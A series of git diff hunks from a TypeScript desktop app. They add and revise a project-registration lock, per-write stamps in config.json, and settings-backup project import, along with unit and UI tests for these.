-        const hasNewDescendantProject = freshDescendantProjectPaths.some(
-          (candidatePath) => !descendantProjectPaths.includes(candidatePath)
-        );
-        // Re-check the canonical parent for initGit: the snapshot-time rejection above
-        // can miss a parent registered concurrently, and the lexical freshParent check
-        // below cannot see it when this path reaches the checkout through a symlink.
-        if (
-          options?.initGit &&
-          findDeepestTopLevelParentProject(canonicalPath, freshConfig.projects)
-        ) {
-          transformFailure = "hierarchy-changed";
-          createResult = Err("Project hierarchy changed concurrently; please retry");
-          return freshConfig;
-        }
-        if (freshParentProjectPath !== parentProjectPath || hasNewDescendantProject) {
-          // A new descendant registered under this path claims the directory tree we
-          // created: recursive cleanup would delete that project's checkout, so treat
-          // it like the duplicate case and leave the directory alone.
-          transformFailure = hasNewDescendantProject
-            ? "hierarchy-changed-descendant"
-            : "hierarchy-changed";
-          createResult = Err("Project hierarchy changed concurrently; please retry");
-          return freshConfig;
-        }
-        const projectConfig: ProjectConfig = {
-          workspaces: [],
-          parentProjectPath: freshParentProjectPath ?? undefined,
-          // Set in the same config write as the registration (a backup restore names
-          // imported projects) rather than as a second write and notification.
-          ...(options?.displayName !== undefined ? { displayName: options.displayName } : {}),
-        };
-        freshConfig.projects.set(normalizedPath, projectConfig);
-        freshConfig.projects = deriveProjectHierarchy(freshConfig.projects);
-        createResult = Ok({ projectConfig, normalizedPath });
-        return freshConfig;
-      });
+          // create() (or a withRegistrationLock caller) already holds the registration lock.
+        },
+        { withinRegistrationLock: true }
+      );
 
       // Do NOT clean up the created directory when a concurrent registration claims
       // it: a duplicate owns this exact path, and a new descendant project lives
@@ -1001,17 +1005,14 @@ export class ProjectService {
       }
 
       const projectConfig: ProjectConfig = { workspaces: [] };
-      // A registration like create()'s, serialized with backup restores the same way.
-      await withProjectRegistrationLock(this.config.rootDir, () =>
-        this.config.editConfig((freshConfig) => {
-          if (freshConfig.projects.has(normalizedPath)) {
-            return freshConfig;
-          }
-          const updatedProjects = new Map(freshConfig.projects);
-          updatedProjects.set(normalizedPath, projectConfig);
-          return { ...freshConfig, projects: updatedProjects };
-        })
-      );
+      await this.config.editConfig((freshConfig) => {
+        if (freshConfig.projects.has(normalizedPath)) {
+          return freshConfig;
+        }
+        const updatedProjects = new Map(freshConfig.projects);
+        updatedProjects.set(normalizedPath, projectConfig);
+        return { ...freshConfig, projects: updatedProjects };
+      });
 
       if (!this.config.loadConfigOrDefault().projects.has(normalizedPath)) {
         // Config persistence (editConfig → private saveConfig) logs-and-continues on write
@@ -1252,17 +1253,6 @@ export class ProjectService {
   }
 
   async remove(projectPath: string, force = false): Promise<Result<void, ProjectRemoveError>> {
-    // Serialized with a settings-backup restore writing project memory, which must not have
-    // a project it matched unregistered underneath it (see withProjectRegistrationLock).
-    return withProjectRegistrationLock(this.config.rootDir, () =>
-      this.removeUnlocked(projectPath, force)
-    );
-  }
-
-  private async removeUnlocked(
-    projectPath: string,
-    force: boolean
-  ): Promise<Result<void, ProjectRemoveError>> {
     try {
       const normalizedPath = stripTrailingSlashes(projectPath);
       let config = this.config.loadConfigOrDefault();

--- a/src/node/services/projectService.ts
+++ b/src/node/services/projectService.ts
@@ -54,6 +54,7 @@ import {
   syncProjectCodeWorkspace,
 } from "@/node/worktree/codeWorkspaceSync";
 import type { MCPServerManager } from "@/node/services/mcpServerManager";
+import { withProjectRegistrationLock } from "@/node/services/refinement/targetMutationLocks";
 import { isProjectTrusted } from "@/node/utils/projectTrust";
 
 function orderWorkspacesForCascadeRemoval(
@@ -1222,6 +1223,17 @@ export class ProjectService {
   }
 
   async remove(projectPath: string, force = false): Promise<Result<void, ProjectRemoveError>> {
+    // Serialized with a settings-backup restore writing project memory, which must not have
+    // a project it matched unregistered underneath it (see withProjectRegistrationLock).
+    return withProjectRegistrationLock(this.config.rootDir, () =>
+      this.removeUnlocked(projectPath, force)
+    );
+  }
+
+  private async removeUnlocked(
+    projectPath: string,
+    force: boolean
+  ): Promise<Result<void, ProjectRemoveError>> {
     try {
       const normalizedPath = stripTrailingSlashes(projectPath);
       let config = this.config.loadConfigOrDefault();

--- a/src/node/services/refinement/targetMutationLocks.ts
+++ b/src/node/services/refinement/targetMutationLocks.ts
@@ -88,6 +88,21 @@ export function memoryMutationLockKey(muxRoot: string, physicalRoot: string): st
     : resolved;
 }
 
+/**
+ * Serializes project unregistration (`ProjectService.remove`) with a settings-backup restore
+ * that writes matched project memory: the restore decides which projects are registered at
+ * its write boundary and must not have one unregistered underneath it before the memory
+ * lands, which would leave restored notes in a scope no project reads. Registration takes
+ * no memory lock and the restore takes this before the memory lock, so the order is fixed.
+ *
+ * In-process only, deliberately: config.json is owned by one main process per root, so
+ * there is no cross-process writer to exclude, and a restore window can outlast the
+ * cross-process leg's fail-fast timeout — a removal should wait for it, not fail.
+ */
+export function withProjectRegistrationLock<T>(muxRoot: string, fn: () => Promise<T>): Promise<T> {
+  return targetMutationLocks.withLock(path.resolve(muxRoot, "config.json#projects"), fn);
+}
+
 /** Acquire one target's in-process mutex + cross-process file lock, then run. */
 export async function withTargetMutationLock<T>(
   muxRoot: string | null,

--- a/src/node/services/refinement/targetMutationLocks.ts
+++ b/src/node/services/refinement/targetMutationLocks.ts
@@ -88,23 +88,6 @@ export function memoryMutationLockKey(muxRoot: string, physicalRoot: string): st
     : resolved;
 }
 
-/**
- * Serializes project registration changes (`ProjectService.create`/`clone`/`remove`) with a
- * settings-backup restore that writes project memory: the restore decides which local
- * project each backed-up entry belongs to at its write boundary, and neither an
- * unregistration (restored notes would land in a scope no project reads) nor a registration
- * at a backed-up source path (the entry would now belong to a different local project) may
- * land underneath it before the memory does. Registration takes no memory lock and the
- * restore takes this before the memory lock, so the order is fixed.
- *
- * In-process only, deliberately: config.json is owned by one main process per root, so
- * there is no cross-process writer to exclude, and a restore window can outlast the
- * cross-process leg's fail-fast timeout — a registration change should wait, not fail.
- */
-export function withProjectRegistrationLock<T>(muxRoot: string, fn: () => Promise<T>): Promise<T> {
-  return targetMutationLocks.withLock(path.resolve(muxRoot, "config.json#projects"), fn);
-}
-
 /** Acquire one target's in-process mutex + cross-process file lock, then run. */
 export async function withTargetMutationLock<T>(
   muxRoot: string | null,

--- a/src/node/services/refinement/targetMutationLocks.ts
+++ b/src/node/services/refinement/targetMutationLocks.ts
@@ -89,15 +89,17 @@ export function memoryMutationLockKey(muxRoot: string, physicalRoot: string): st
 }
 
 /**
- * Serializes project unregistration (`ProjectService.remove`) with a settings-backup restore
- * that writes matched project memory: the restore decides which projects are registered at
- * its write boundary and must not have one unregistered underneath it before the memory
- * lands, which would leave restored notes in a scope no project reads. Registration takes
- * no memory lock and the restore takes this before the memory lock, so the order is fixed.
+ * Serializes project registration changes (`ProjectService.create`/`clone`/`remove`) with a
+ * settings-backup restore that writes project memory: the restore decides which local
+ * project each backed-up entry belongs to at its write boundary, and neither an
+ * unregistration (restored notes would land in a scope no project reads) nor a registration
+ * at a backed-up source path (the entry would now belong to a different local project) may
+ * land underneath it before the memory does. Registration takes no memory lock and the
+ * restore takes this before the memory lock, so the order is fixed.
  *
  * In-process only, deliberately: config.json is owned by one main process per root, so
  * there is no cross-process writer to exclude, and a restore window can outlast the
- * cross-process leg's fail-fast timeout — a removal should wait for it, not fail.
+ * cross-process leg's fail-fast timeout — a registration change should wait, not fail.
  */
 export function withProjectRegistrationLock<T>(muxRoot: string, fn: () => Promise<T>): Promise<T> {
   return targetMutationLocks.withLock(path.resolve(muxRoot, "config.json#projects"), fn);

--- a/src/node/services/serviceContainer.ts
+++ b/src/node/services/serviceContainer.ts
@@ -266,6 +266,9 @@ export class ServiceContainer {
     // Backup restores register approved project imports through the same create() path the
     // UI uses; setter injection because BackupService is constructed before ProjectService.
     this.backupService.setProjectService(this.projectService);
+    // Restored project memory is written directly, so the service announces it through
+    // MemoryService for the memory browser's change subscription.
+    this.backupService.setMemoryNotifier(this.memoryService);
     this.desktopSessionManager = new DesktopSessionManager({
       config,
       experimentsService: this.experimentsService,

--- a/src/node/services/serviceContainer.ts
+++ b/src/node/services/serviceContainer.ts
@@ -263,6 +263,9 @@ export class ServiceContainer {
     this.projectService.setWorkspaceService(this.workspaceService);
     this.projectService.setWorkspaceMetadataRefresher(this.workspaceService);
     this.projectService.setMcpServerManager(this.mcpServerManager);
+    // Backup restores register approved project imports through the same create() path the
+    // UI uses; setter injection because BackupService is constructed before ProjectService.
+    this.backupService.setProjectService(this.projectService);
     this.desktopSessionManager = new DesktopSessionManager({
       config,
       experimentsService: this.experimentsService,

--- a/src/node/services/tools/memory.ts
+++ b/src/node/services/tools/memory.ts
@@ -31,8 +31,8 @@ const READ_WRITE_ACCESS: MemoryScopeAccess = {
  * Map an agent class onto the per-scope memory write matrix
  * (see MemoryScopeAccess in src/common/constants/memory.ts):
  * - Plan-like and editing-capable (exec-like) agents get read-write everywhere;
- *   project memory is host-local and never mutates the repo checkout, so even
- *   plan agents may write it.
+ *   project memory is host-local (opt-in settings backup aside) and never
+ *   mutates the repo checkout, so even plan agents may write it.
  * - Everything else (explore/read-only agents) is view-only.
  */
 export function resolveMemoryAccessPolicy(options: {

--- a/src/node/services/tools/shared/configReadWrite.ts
+++ b/src/node/services/tools/shared/configReadWrite.ts
@@ -1,3 +1,4 @@
+import { randomUUID } from "node:crypto";
 import * as fs from "node:fs/promises";
 import * as path from "node:path";
 
@@ -97,7 +98,17 @@ export async function writeConfigDocument<TKey extends ConfigFileKey>(
 ): Promise<ConfigDocumentFor<TKey>> {
   const entry = CONFIG_FILE_REGISTRY[fileKey];
   const filePath = getConfigDocumentPath(xumHomeDir, fileKey);
-  const validatedDocument = parseAndValidateDocument(fileKey, entry.schema, document, filePath);
+  // config.json carries a per-save write stamp (see Config.configFileWriteGeneration). A raw
+  // rewrite refreshes it like a Config save does — the document read from disk carries the
+  // previous one — or a reader comparing generations around this write would not see it.
+  const stamped =
+    fileKey === "config" &&
+    typeof document === "object" &&
+    document !== null &&
+    !Array.isArray(document)
+      ? { ...document, writeId: randomUUID() }
+      : document;
+  const validatedDocument = parseAndValidateDocument(fileKey, entry.schema, stamped, filePath);
   const serialized = JSON.stringify(validatedDocument, null, 2);
 
   await fs.mkdir(xumHomeDir, { recursive: true });

--- a/src/node/services/tools/xum_config_write.test.ts
+++ b/src/node/services/tools/xum_config_write.test.ts
@@ -420,9 +420,13 @@ describe("mux_config_write", () => {
 
     const configDocument = JSON.parse(await fs.readFile(configPath, "utf-8")) as {
       defaultModel?: string;
+      writeId?: string;
     };
     // Repaired to an object carrying the mutation and the per-save write stamp, nothing else.
-    expect(configDocument).toEqual({ defaultModel: "openai:gpt-4o", writeId: expect.any(String) });
+    expect(configDocument).toEqual({
+      defaultModel: "openai:gpt-4o",
+      writeId: expect.any(String) as string,
+    });
   });
 
   it("repairs primitive providers.jsonc root during write", async () => {
@@ -475,9 +479,13 @@ describe("mux_config_write", () => {
 
     const configDocument = JSON.parse(await fs.readFile(configPath, "utf-8")) as {
       defaultModel?: string;
+      writeId?: string;
     };
     // Repaired to an object carrying the mutation and the per-save write stamp, nothing else.
-    expect(configDocument).toEqual({ defaultModel: "openai:gpt-4o", writeId: expect.any(String) });
+    expect(configDocument).toEqual({
+      defaultModel: "openai:gpt-4o",
+      writeId: expect.any(String) as string,
+    });
   });
 
   it("repairs array providers.jsonc root during write", async () => {

--- a/src/node/services/tools/xum_config_write.test.ts
+++ b/src/node/services/tools/xum_config_write.test.ts
@@ -421,7 +421,8 @@ describe("mux_config_write", () => {
     const configDocument = JSON.parse(await fs.readFile(configPath, "utf-8")) as {
       defaultModel?: string;
     };
-    expect(configDocument).toEqual({ defaultModel: "openai:gpt-4o" });
+    // Repaired to an object carrying the mutation and the per-save write stamp, nothing else.
+    expect(configDocument).toEqual({ defaultModel: "openai:gpt-4o", writeId: expect.any(String) });
   });
 
   it("repairs primitive providers.jsonc root during write", async () => {
@@ -475,7 +476,8 @@ describe("mux_config_write", () => {
     const configDocument = JSON.parse(await fs.readFile(configPath, "utf-8")) as {
       defaultModel?: string;
     };
-    expect(configDocument).toEqual({ defaultModel: "openai:gpt-4o" });
+    // Repaired to an object carrying the mutation and the per-save write stamp, nothing else.
+    expect(configDocument).toEqual({ defaultModel: "openai:gpt-4o", writeId: expect.any(String) });
   });
 
   it("repairs array providers.jsonc root during write", async () => {
@@ -571,6 +573,32 @@ describe("mux_config_write", () => {
     };
     expect(written.defaultModel).toBe("openai:gpt-4o");
     expect(written.projects.map(([projectPath]) => projectPath)).toEqual(["/imported"]);
+  });
+
+  it("refreshes the write stamp on every config.json rewrite", async () => {
+    using xumHome = new TestTempDir("mux-config-write");
+    const configPath = path.join(xumHome.path, "config.json");
+    const tool = await createWriteTool(xumHome.path, GLOBAL_WORKSPACE_ID);
+    const stampAfter = async (): Promise<unknown> => {
+      const result = (await tool.execute!(
+        {
+          file: "config",
+          operations: [{ op: "set", path: ["defaultModel"], value: "openai:gpt-4o" }],
+          confirm: true,
+        },
+        mockToolCallOptions
+      )) as XumConfigWriteResult;
+      expect(result.success).toBe(true);
+      return (JSON.parse(await fs.readFile(configPath, "utf-8")) as { writeId?: unknown }).writeId;
+    };
+    // The same operation twice writes the same content; a reader comparing the file's write
+    // generation around the second write (a settings-backup export deciding whether remote
+    // hints still apply) must still see a write.
+    const first = await stampAfter();
+    const second = await stampAfter();
+    expect(typeof first).toBe("string");
+    expect(typeof second).toBe("string");
+    expect(second).not.toBe(first);
   });
 
   it("rejects writes to symlinked providers.jsonc target", async () => {

--- a/src/node/services/tools/xum_config_write.test.ts
+++ b/src/node/services/tools/xum_config_write.test.ts
@@ -8,6 +8,9 @@ import * as jsonc from "jsonc-parser";
 const GLOBAL_WORKSPACE_ID = "workspace-global";
 import type { XumToolScope } from "@/common/types/toolScope";
 
+import { projectRegistrationLockFilePath } from "@/node/config/projectRegistrationLock";
+import { acquireProcessFileLock } from "@/node/utils/concurrency/fileLock";
+
 import { createXumConfigWriteTool } from "./xum_config_write";
 import { TestTempDir, createTestToolConfig } from "./testHelpers";
 
@@ -530,6 +533,44 @@ describe("mux_config_write", () => {
 
     // External target must remain unchanged
     expect(await fs.readFile(externalTarget, "utf-8")).toBe(originalContent);
+  });
+
+  it("rewrites config.json only under the project registration lock, from the bytes under it", async () => {
+    using xumHome = new TestTempDir("mux-config-write");
+    const configPath = path.join(xumHome.path, "config.json");
+    await fs.writeFile(configPath, JSON.stringify({ projects: [] }), "utf-8");
+    // A settings-backup import in another process holds the lock while it registers a
+    // project; a value-only rewrite from bytes read before that would drop the project.
+    const otherProcess = await acquireProcessFileLock({
+      lockPath: projectRegistrationLockFilePath(xumHome.path),
+      timeoutMs: 5_000,
+      label: "test holder",
+    });
+    const tool = await createWriteTool(xumHome.path, GLOBAL_WORKSPACE_ID);
+    const writing = tool.execute!(
+      {
+        file: "config",
+        operations: [{ op: "set", path: ["defaultModel"], value: "openai:gpt-4o" }],
+        confirm: true,
+      },
+      mockToolCallOptions
+    ) as Promise<XumConfigWriteResult>;
+    await new Promise((resolve) => setTimeout(resolve, 100));
+    expect(JSON.parse(await fs.readFile(configPath, "utf-8"))).toEqual({ projects: [] });
+
+    await fs.writeFile(
+      configPath,
+      JSON.stringify({ projects: [["/imported", { workspaces: [] }]] }),
+      "utf-8"
+    );
+    await otherProcess[Symbol.asyncDispose]();
+    expect((await writing).success).toBe(true);
+    const written = JSON.parse(await fs.readFile(configPath, "utf-8")) as {
+      projects: Array<[string, unknown]>;
+      defaultModel: string;
+    };
+    expect(written.defaultModel).toBe("openai:gpt-4o");
+    expect(written.projects.map(([projectPath]) => projectPath)).toEqual(["/imported"]);
   });
 
   it("rejects writes to symlinked providers.jsonc target", async () => {

--- a/src/node/services/tools/xum_config_write.ts
+++ b/src/node/services/tools/xum_config_write.ts
@@ -5,6 +5,10 @@ import type { XumConfigWriteToolArgs, XumConfigWriteToolResult } from "@/common/
 import { getErrorMessage } from "@/common/utils/errors";
 import { TOOL_DEFINITIONS } from "@/common/utils/tools/toolDefinitions";
 import type { ToolConfiguration, ToolFactory } from "@/common/utils/tools/tools";
+import {
+  withProjectRegistrationFileLock,
+  type ProjectRegistrationLockHandle,
+} from "@/node/config/projectRegistrationLock";
 import { applyMutations } from "@/node/services/tools/shared/configMutationEngine";
 import { REDACTED_SECRET_VALUE } from "@/node/services/tools/shared/configRedaction";
 import {
@@ -49,39 +53,55 @@ export const createXumConfigWriteTool: ToolFactory = (config: ToolConfiguration)
         }
 
         const xumHome = config.xumScope!.xumHome;
-        const currentDocument = await readConfigDocumentUnvalidated(xumHome, args.file);
         const registryEntry = CONFIG_FILE_REGISTRY[args.file];
-        const mutationResult = applyMutations(
-          currentDocument,
-          args.operations,
-          registryEntry.schema,
-          { rootContainer: registryEntry.rootContainer }
-        );
+        const rewrite = async (
+          lock: ProjectRegistrationLockHandle | null
+        ): Promise<XumConfigWriteToolResult> => {
+          const currentDocument = await readConfigDocumentUnvalidated(xumHome, args.file);
+          const mutationResult = applyMutations(
+            currentDocument,
+            args.operations,
+            registryEntry.schema,
+            { rootContainer: registryEntry.rootContainer }
+          );
 
-        if (!mutationResult.success) {
+          if (!mutationResult.success) {
+            return {
+              success: false,
+              error: mutationResult.error,
+              validationIssues: mutationResult.validationIssues?.map((issue) => ({
+                path: issue.path.filter(
+                  (segment): segment is string | number => typeof segment !== "symbol"
+                ),
+                message: issue.message,
+              })),
+            };
+          }
+
+          await lock?.assertStillOwned();
+          await writeConfigDocument(xumHome, args.file, mutationResult.document);
           return {
-            success: false,
-            error: mutationResult.error,
-            validationIssues: mutationResult.validationIssues?.map((issue) => ({
-              path: issue.path.filter(
-                (segment): segment is string | number => typeof segment !== "symbol"
-              ),
-              message: issue.message,
-            })),
+            success: true,
+            file: args.file,
+            appliedOps: mutationResult.appliedOps,
+            summary: `Applied ${mutationResult.appliedOps} operation(s) to ${args.file}`,
           };
-        }
-
-        await writeConfigDocument(xumHome, args.file, mutationResult.document);
-
-        // Notify services that config has changed (triggers hot-reload for providers)
-        config.onConfigChanged?.();
-
-        return {
-          success: true,
-          file: args.file,
-          appliedOps: mutationResult.appliedOps,
-          summary: `Applied ${mutationResult.appliedOps} operation(s) to ${args.file}`,
         };
+        // config.json carries the project set, and this rewrites the whole document from the
+        // bytes it read: like every Config.editConfig save it has to happen under the project
+        // registration lock, or a value-only edit here would drop a project a settings-backup
+        // import registered meanwhile, or change registrations while the import writes that
+        // project's memory (see projectRegistrationLock.ts). Read and written under one hold,
+        // verified immediately before the write.
+        const result =
+          args.file === "config"
+            ? await withProjectRegistrationFileLock(xumHome, rewrite)
+            : await rewrite(null);
+        if (result.success) {
+          // Notify services that config has changed (triggers hot-reload for providers)
+          config.onConfigChanged?.();
+        }
+        return result;
       } catch (error) {
         const message = getErrorMessage(error);
         return {

--- a/tests/ui/BackupSection.test.ts
+++ b/tests/ui/BackupSection.test.ts
@@ -745,6 +745,38 @@ describe("BackupSection", () => {
     );
   });
 
+  test("drops stale project import candidates after a push replaces the remote bundle", async () => {
+    const { view } = renderBackupSection({
+      backupPreview: {
+        pushChanges: [],
+        restoreChanges: [],
+        localOnlyFiles: [],
+        redactions: [],
+        commandApprovals: [],
+        projectImports: [
+          {
+            sourcePath: "/home/dev/src/rocket",
+            name: "rocket",
+            memoryFileCount: 1,
+            token: "rocket-token",
+          },
+        ],
+        projectBundleSkipped: false,
+        pushError: null,
+      },
+    });
+    const canvas = within(view.container);
+    await canvas.findByText("Settings backup");
+
+    fireEvent.click(canvas.getByRole("button", { name: "Preview changes" }));
+    await canvas.findByText("Projects to reimport");
+
+    // The push rewrote the remote bundle; the candidates' tokens describe the old one.
+    fireEvent.click(canvas.getByRole("button", { name: "Back up now" }));
+    await canvas.findByText(/Backed up settings at/);
+    expect(canvas.queryByText("Projects to reimport")).toBeNull();
+  });
+
   test("reports a skipped project bundle after a preview", async () => {
     const { view } = renderBackupSection({
       backupPreview: {

--- a/tests/ui/BackupSection.test.ts
+++ b/tests/ui/BackupSection.test.ts
@@ -623,4 +623,139 @@ describe("BackupSection", () => {
 
     await canvas.findByText("Could not persist backup settings");
   });
+
+  test("sends only approved project imports with their target paths on restore", async () => {
+    const candidate = {
+      sourcePath: "/home/dev/src/rocket",
+      name: "rocket",
+      gitRemote: "git@github.com:dev/rocket.git",
+      memoryFileCount: 2,
+      token: "rocket-token",
+    };
+    const unapproved = {
+      sourcePath: "/home/dev/src/probe",
+      name: "probe",
+      memoryFileCount: 0,
+      token: "probe-token",
+    };
+    const { client, view } = renderBackupSection({
+      backupPreview: {
+        pushChanges: [],
+        restoreChanges: [],
+        localOnlyFiles: [],
+        redactions: [],
+        commandApprovals: [],
+        projectImports: [candidate, unapproved],
+        projectBundleSkipped: false,
+      },
+      backupRestore: {
+        commit: "def5678",
+        snapshotPath: "/tmp/mux-backup-snapshot",
+        changedFiles: [],
+        localOnlyFiles: [],
+        projectImportResults: [
+          {
+            sourcePath: candidate.sourcePath,
+            targetPath: "/home/other/rocket",
+            name: candidate.name,
+            status: "imported",
+            writtenFiles: ["memory/project/rocket-abc/notes.md"],
+            skippedFiles: [],
+          },
+        ],
+        projectBundleSkipped: false,
+      },
+    });
+    const canvas = within(view.container);
+    await canvas.findByText("Settings backup");
+
+    fireEvent.click(canvas.getByRole("button", { name: "Preview changes" }));
+    await canvas.findByText("Projects to reimport");
+    // The remote is rendered as inert text, never a link.
+    expect(canvas.getByText(/git@github\.com:dev\/rocket\.git/)).toBeTruthy();
+    expect(canvas.queryByRole("link")).toBeNull();
+
+    const restore = jest.spyOn(client.backup, "restore");
+    fireEvent.click(canvas.getByRole("checkbox", { name: "Import project rocket" }));
+    const targetInputs = canvas.getAllByLabelText("Local project directory");
+    fireEvent.change(targetInputs[0]!, { target: { value: "/home/other/rocket" } });
+    await confirmRestore(canvas);
+
+    await waitFor(() =>
+      expect(restore).toHaveBeenCalledWith(
+        expect.objectContaining({
+          projectImports: [{ token: "rocket-token", targetPath: "/home/other/rocket" }],
+        })
+      )
+    );
+    await canvas.findByText("Project import results");
+    expect(canvas.getByText(/Imported: rocket/)).toBeTruthy();
+  });
+
+  test("re-presents fresh candidates when import approval goes stale", async () => {
+    const staleCandidate = {
+      sourcePath: "/home/dev/src/rocket",
+      name: "rocket",
+      memoryFileCount: 1,
+      token: "stale-token",
+    };
+    const freshCandidate = { ...staleCandidate, token: "fresh-token" };
+    const { client, view } = renderBackupSection({
+      backupPreview: {
+        pushChanges: [],
+        restoreChanges: [],
+        localOnlyFiles: [],
+        redactions: [],
+        commandApprovals: [],
+        projectImports: [staleCandidate],
+        projectBundleSkipped: false,
+      },
+    });
+    const canvas = within(view.container);
+    await canvas.findByText("Settings backup");
+
+    fireEvent.click(canvas.getByRole("button", { name: "Preview changes" }));
+    await canvas.findByText("Projects to reimport");
+    fireEvent.click(canvas.getByRole("checkbox", { name: "Import project rocket" }));
+
+    const restore = jest.spyOn(client.backup, "restore").mockResolvedValueOnce({
+      success: false,
+      error: {
+        code: "PROJECT_IMPORT_APPROVAL_REQUIRED",
+        message: "The approved project imports no longer match the backup.",
+        projectImports: [freshCandidate],
+      },
+    });
+    await confirmRestore(canvas);
+    await waitFor(() => expect(restore).toHaveBeenCalledTimes(1));
+
+    // The fresh candidate replaced the stale one and starts unapproved, so an immediate
+    // second restore sends no imports.
+    await canvas.findByText("Projects to reimport");
+    const checkbox = canvas.getByRole("checkbox", { name: "Import project rocket" });
+    expect(checkbox.getAttribute("aria-checked")).toBe("false");
+    await confirmRestore(canvas);
+    await waitFor(() =>
+      expect(restore).toHaveBeenLastCalledWith(expect.objectContaining({ projectImports: [] }))
+    );
+  });
+
+  test("reports a skipped project bundle after a preview", async () => {
+    const { view } = renderBackupSection({
+      backupPreview: {
+        pushChanges: [],
+        restoreChanges: [],
+        localOnlyFiles: [],
+        redactions: [],
+        commandApprovals: [],
+        projectImports: [],
+        projectBundleSkipped: true,
+      },
+    });
+    const canvas = within(view.container);
+    await canvas.findByText("Settings backup");
+
+    fireEvent.click(canvas.getByRole("button", { name: "Preview changes" }));
+    await canvas.findByText(/carries a project bundle, but project backup is disabled/);
+  });
 });

--- a/tests/ui/BackupSection.test.ts
+++ b/tests/ui/BackupSection.test.ts
@@ -857,6 +857,18 @@ describe("BackupSection", () => {
     ).toBeTruthy();
     expect(canvas.getByText(/Newly registered project/)).toBeTruthy();
     expect(canvas.getByText(/remove the projects marked as newly registered/)).toBeTruthy();
+
+    // Saving different settings drops the preview and its approvals, not this: the files and
+    // the registration are still there to undo.
+    fireEvent.change(canvas.getByLabelText("Repository URL"), {
+      target: { value: "git@github.com:example/other.git" },
+    });
+    fireEvent.click(canvas.getByRole("button", { name: "Save settings" }));
+    await canvas.findByText("Backup settings saved.");
+    expect(
+      canvas.getByText(/Added memory files: memory\/project\/rocket-abc\/notes\.md/)
+    ).toBeTruthy();
+    expect(canvas.getByText(/Newly registered project/)).toBeTruthy();
   });
 
   test("re-presents fresh candidates when import approval goes stale", async () => {

--- a/tests/ui/BackupSection.test.ts
+++ b/tests/ui/BackupSection.test.ts
@@ -761,6 +761,104 @@ describe("BackupSection", () => {
     expect(canvas.getByRole("checkbox", { name: "Import project rocket" })).toBeTruthy();
   });
 
+  test("keeps an earlier attempt's added files and registration on a retry", async () => {
+    const candidate = {
+      sourcePath: "/home/dev/src/rocket",
+      name: "rocket",
+      memoryFileCount: 2,
+      token: "rocket-token",
+    };
+    const attempt = (attemptResult: {
+      writtenFiles: string[];
+      skippedFiles: string[];
+      registered: boolean;
+    }) => ({
+      commit: "def5678",
+      snapshotPath: "/tmp/mux-backup-snapshot",
+      changedFiles: [],
+      localOnlyFiles: [],
+      projectImportResults: [
+        {
+          sourcePath: candidate.sourcePath,
+          targetPath: "/home/other/rocket",
+          name: candidate.name,
+          status: "imported" as const,
+          ...attemptResult,
+        },
+      ],
+      projectBundleSkipped: false,
+      unapprovedProjectImports: attemptResult.skippedFiles.length > 0 ? [candidate] : [],
+    });
+    const { view } = renderBackupSection(
+      {
+        backupPreview: {
+          pushChanges: [],
+          restoreChanges: [],
+          localOnlyFiles: [],
+          redactions: [],
+          commandApprovals: [],
+          projectImports: [candidate],
+          projectBundleSkipped: false,
+          pushError: null,
+        },
+      },
+      (client) => {
+        // The first attempt registers the project and adds one file before a conflict; the
+        // retry finds that file in place and reports only what it added itself.
+        jest
+          .spyOn(client.backup, "restore")
+          .mockResolvedValueOnce({
+            success: true,
+            data: attempt({
+              writtenFiles: ["memory/project/rocket-abc/notes.md"],
+              skippedFiles: ["memory/project/rocket-abc/conflict.md"],
+              registered: true,
+            }),
+          })
+          .mockResolvedValueOnce({
+            success: true,
+            data: attempt({
+              writtenFiles: ["memory/project/rocket-abc/conflict.md"],
+              skippedFiles: [],
+              registered: false,
+            }),
+          });
+      }
+    );
+    const canvas = within(view.container);
+    await canvas.findByText("Settings backup");
+
+    fireEvent.click(canvas.getByRole("button", { name: "Preview changes" }));
+    await canvas.findByText("Projects to reimport");
+    fireEvent.click(canvas.getByRole("checkbox", { name: "Import project rocket" }));
+    fireEvent.change(canvas.getAllByLabelText("Local project directory")[0]!, {
+      target: { value: "/home/other/rocket" },
+    });
+    await confirmRestore(canvas);
+    await canvas.findByText(/Partially imported: rocket/);
+    // The undo list names the files, not a count.
+    expect(
+      canvas.getByText(/Added memory file: memory\/project\/rocket-abc\/notes\.md/)
+    ).toBeTruthy();
+
+    fireEvent.click(canvas.getByRole("checkbox", { name: "Import project rocket" }));
+    fireEvent.change(canvas.getAllByLabelText("Local project directory")[0]!, {
+      target: { value: "/home/other/rocket" },
+    });
+    await confirmRestore(canvas);
+    await canvas.findByText(/^Imported: rocket/);
+    // One card for the import, listing both attempts' files and the registration the first
+    // attempt made — the retry alone would say nothing was registered.
+    expect(canvas.queryByText(/Partially imported: rocket/)).toBeNull();
+    expect(
+      canvas.getByText(
+        /Added memory files: memory\/project\/rocket-abc\/notes\.md, memory\/project\/rocket-abc\/conflict\.md/
+      )
+    ).toBeTruthy();
+    expect(canvas.getByText(/Newly registered project/)).toBeTruthy();
+    expect(canvas.getByText(/remove the projects marked as newly registered/)).toBeTruthy();
+  });
+
   test("re-presents fresh candidates when import approval goes stale", async () => {
     const staleCandidate = {
       sourcePath: "/home/dev/src/rocket",

--- a/tests/ui/BackupSection.test.ts
+++ b/tests/ui/BackupSection.test.ts
@@ -667,6 +667,7 @@ describe("BackupSection", () => {
             status: "imported",
             writtenFiles: ["memory/project/rocket-abc/notes.md"],
             skippedFiles: [],
+            registered: true,
           },
         ],
         projectBundleSkipped: false,
@@ -697,6 +698,67 @@ describe("BackupSection", () => {
     );
     await canvas.findByText("Project import results");
     expect(canvas.getByText(/Imported: rocket/)).toBeTruthy();
+  });
+
+  test("reports a conflicted import as partial and keeps its candidate on offer", async () => {
+    const candidate = {
+      sourcePath: "/home/dev/src/rocket",
+      name: "rocket",
+      memoryFileCount: 2,
+      token: "rocket-token",
+    };
+    const { view } = renderBackupSection({
+      backupPreview: {
+        pushChanges: [],
+        restoreChanges: [],
+        localOnlyFiles: [],
+        redactions: [],
+        commandApprovals: [],
+        projectImports: [candidate],
+        projectBundleSkipped: false,
+        pushError: null,
+      },
+      backupRestore: {
+        commit: "def5678",
+        snapshotPath: "/tmp/mux-backup-snapshot",
+        changedFiles: [],
+        localOnlyFiles: [],
+        projectImportResults: [
+          {
+            sourcePath: candidate.sourcePath,
+            targetPath: "/home/other/rocket",
+            name: candidate.name,
+            status: "imported",
+            writtenFiles: ["memory/project/rocket-abc/notes.md"],
+            skippedFiles: ["memory/project/rocket-abc/conflict.md"],
+            // Imported into a project that already existed: nothing to unregister.
+            registered: false,
+          },
+        ],
+        projectBundleSkipped: false,
+        // The backend re-offers a conflicted import; the UI must not call it done.
